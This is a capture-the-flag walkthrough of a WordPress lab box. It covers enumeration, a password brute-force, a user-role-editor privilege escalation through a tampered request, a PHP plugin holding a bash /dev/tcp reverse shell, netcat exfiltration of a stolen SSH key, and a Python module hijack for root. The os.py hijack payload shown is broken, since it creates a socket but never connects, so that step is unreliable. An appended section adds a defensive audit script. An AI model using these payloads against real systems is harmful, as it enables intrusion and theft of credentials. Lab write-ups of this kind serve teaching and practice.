Great box to learn about the various ways of enumerating and exploiting WordPress.
In order to gain access you are required to enumerate the box using WPScan, however sufficient information to fully compromise the box is only obtained by doing further enumeration (read TRY HARDER) using Nmap scripts.
Lastly, before you begin add "jack.thm" to your hosts file (/etc/hosts), as it is required for name resolution.
We can start the enumeration process by using nmap to see which ports the host is listening on. I typically start enumerating the top 20 ports in order to save time, while a full port scan continues running in the background. This allows me to get a good feeling of the tech used on the box and occasionally I have gained low privilege access to the box before the full port enumeration even completes.
```bash
sudo nmap --top-ports 20 -sC -sV <IP Address> --open
```
The Nmap scan reveals that port 22 and port 80 are open, running OpenSSH 7.2p2 and Apache 2.4.18 respectively.
From experience we know SSH is rarely vulnerable, so let's focus on port 80 instead.
The server is running Jack’s personal blog.
There is no obvious indication of which blogging framework is being used, so let's enumerate further using "whatweb" to see what tech is running this blog:
```bash
whatweb <IP Address> --verbose
```
Now that we know the site is running WordPress 5.3.2 we can start to enumerate more specific information such as plugins, themes, users, config backups, DB exports and more. My tool of choice for WordPress enumeration is WPScan.
We can use WPScan to enumerate the above items with the following command:
```bash
wpscan --url http://jack.thm --enumerate ap,at,u --detection-mode aggressive
```
- ap = All Plugins
- at = All Themes
- u = Enumerate Users
- Detection-Mode = Since we’re not worried about being detected we can use aggressive mode which occasionally delivers more results at the cost of generating more noise.
Our results show that we have 3 users of value but very little else in terms of vulnerable plugins or themes.
Our next step will be to see if we can get a valid password for one of the three users. From our WPScan output we can see that XML-RPC is accessible, so we can use WPScan to run the brute-force attack through it.
```bash
wpscan --url http://jack.thm -U name1,name2,name3 -P /usr/share/wordlist/<wordlist of choice>
```
Note that I used a shorter password list than rockyou.txt. For these labs I typically leave a brute-force attack running for no more than 30 min before moving on to a different password list or method. In this case it paid off and I quickly obtained a password for one of the accounts.
Now that we have enough information, let's continue with the exploitation.
We can start by logging into Jack's WordPress site at http://jack.thm/wp-admin using the credentials obtained earlier.
Once logged in we realise that there's not much we can do, so we need to enumerate a little more (TRY HARDER). This also teaches us a valuable lesson: DON'T ALWAYS TRUST THE OUTPUT FROM A SINGLE TOOL!
There are multiple other tools for enumerating WordPress, but let's go back to good old Nmap with the following command:
```bash
sudo nmap -p 80 --script="http-wordpress-enum*" --script-args search-limit=100 jack.thm
```
And BINGO, we have our next piece of the puzzle: a plugin with a known WordPress privilege escalation vulnerability, called user-role-editor.
A simple searchsploit search reveals the specific exploit.
Although we won't use this specific exploit, as it requires Metasploit, we can read the Ruby exploit to understand how to perform the exploitation manually, à la OSCP!
After reviewing the exploit and some simple googling I constructed a fairly simple procedure using Burp Suite to gain privileged access to the WordPress portal.
- Log into WordPress using the obtained credentials
- Select "Profile"
- Start Burp Suite (or the HTTP proxy of your choice) and start capturing web traffic
- Select "Update Profile"
- In Burp Suite inspect the captured HTTP POST and append the following string to the end of the request body: `&ure_other_roles=administrator`
- Click "Forward" to submit the HTTP request and refresh the WordPress admin page, which now shows more admin options, including the "Plugins" menu
Next we need to get a reverse shell. To do so I will create a custom WordPress plugin containing a simple PHP reverse shell.
Create a new PHP file on your attack machine containing the following. I called it shell-plugin.php:
```php
<?php
/**
 * Plugin Name: Reverse Shell
 * Plugin URI:
 * Description: Reverse Shell
 * Version: 1.0
 * Author: H4SH95
 * Author URI: H@PPY D@Y5
 */
exec("/bin/bash -c 'bash -i >& /dev/tcp/<YOUR IP>/80 0>&1'");
```
Create a zip file from the above PHP file using the following:
```bash
zip shell-plugin.zip ./shell-plugin.php
```
- Start your netcat listener:
```bash
sudo nc -nlvp 80
```
Next we’ll upload the plugin using the following steps and activate our reverse shell.
- Select “Plugins” then “Add New”
- Select “Upload Plugin”
- Select “Browse”
- Select your Plugin zip file and “Install Now”
- Click “Activate Now” and check your listener
- Ta F@#$king Da!!!
During the enumeration process I found a file in "/home/jack" called "reminder.txt". This file led me to "/var/backups", where I found an SSH private key called "id_rsa" to use for authentication.
In order to use the key we first need to transfer the file to our attack machine. I used netcat with the following steps to transfer the file.
- On the attack machine start your netcat listener to receive the file: `sudo nc -nlvp 443 > id_rsa`
- On the target send the file to the attack machine using netcat by issuing the following command: `nc -nv <ATTACK IP> 443 < id_rsa`
Once you have the file on the attack machine we can use it to gain access to the target over SSH.
- Assign the correct permissions to the SSH key using the following command: `chmod 600 id_rsa`
- `ssh -i id_rsa jack@<TARGET IP>`
Once I gained access to the target I spent a lot of time enumerating various things but nothing led me to a clear indication of how to Priv Esc.
The one thing you will notice is that we have write access to various Python modules, which typically indicates we may be able to use a Python module for privilege escalation. The missing piece now is a Python script running as root.
After more enumeration and not finding anything specific, I downloaded pspy, an unprivileged Linux process monitor, from https://github.com/DominicBreuker/pspy
I transferred the file from my attack host to the target by hosting it over HTTP and downloading it on the target using wget:
- On the attack machine start a Python web server: `sudo python3 -m http.server 443`
- On the target download the file to /tmp: `wget http://<ATTACK IP>:443/pspy64 -O /tmp/pspy64`
- `chmod +x /tmp/pspy64`
After monitoring the output from pspy64 for a while I noticed there's a script running every so often: "/opt/statuscheck/checker.py".
It appears the script does a simple HTTP query to http://localhost using curl and then writes everything to /opt/statuscheck/output.log.
When we take a look at the Python script you'll notice that it imports the Python OS module (os.py).
Checking the permissions on os.py, we see that the file's group, of which we are a member, has write access to it.
Follow these steps to gain privileged access:
- Start your listener on the attack machine: `sudo nc -nlvp 443`
- Edit the os.py file and add the following to the end of the file:
```python
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
```
wait a minute or two and there you go!!!
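The root cause here is a privileged script importing a module whose file an unprivileged group can overwrite. As an added example from the defensive side (not code from the post or from pspy), the following Python audit statically lists a script's imports, resolves each to its file on disk and flags any whose file or containing directory is group- or world-writable. The checker script, helper module name and temporary directory in `demo()` are constructed for the demonstration.

```python
import ast, importlib, importlib.util, os, stat, sys, tempfile

def imported_modules(script_path):
    """Top-level module names a script imports, found statically with ast."""
    with open(script_path) as f:
        tree = ast.parse(f.read(), script_path)
    names = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            names.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            names.add(node.module.split(".")[0])
    return names

def writable_by_others(path):
    """True when the path is group- or world-writable (the condition on this box)."""
    return bool(os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit_script(script_path):
    """Map each import whose module file (or its directory) is group/world-writable
    to that file: a non-root user could replace it before root runs the script."""
    findings = {}
    for name in sorted(imported_modules(script_path)):
        try:
            spec = importlib.util.find_spec(name)
        except (ImportError, ValueError):
            continue
        if spec is None or not spec.origin or spec.origin in ("built-in", "frozen"):
            continue  # nothing on disk to tamper with
        if writable_by_others(spec.origin) or writable_by_others(os.path.dirname(spec.origin)):
            findings[name] = spec.origin
    return findings

def demo():
    """Constructed scenario: a root-run checker script imports a helper module
    whose file has been left group-writable, mirroring os.py on this box."""
    d = tempfile.mkdtemp()
    helper = os.path.join(d, "statuscheck_helper.py")
    with open(helper, "w") as f:
        f.write("def ping():\n    return 'ok'\n")
    os.chmod(helper, 0o664)  # group-writable: the weakness being audited
    checker = os.path.join(d, "checker.py")
    with open(checker, "w") as f:
        f.write("import os\nimport statuscheck_helper\n")
    sys.path.insert(0, d)
    importlib.invalidate_caches()  # make the new module visible to find_spec
    return audit_script(checker)

if __name__ == "__main__":
    print(demo())  # e.g. {'statuscheck_helper': '/tmp/tmpXXXX/statuscheck_helper.py'}
```

Running `audit_script` against every script launched by root cron jobs or timers, on a real system, surfaces exactly the condition pspy revealed here; the fix is restoring root-only write permissions on the interpreter's library directories.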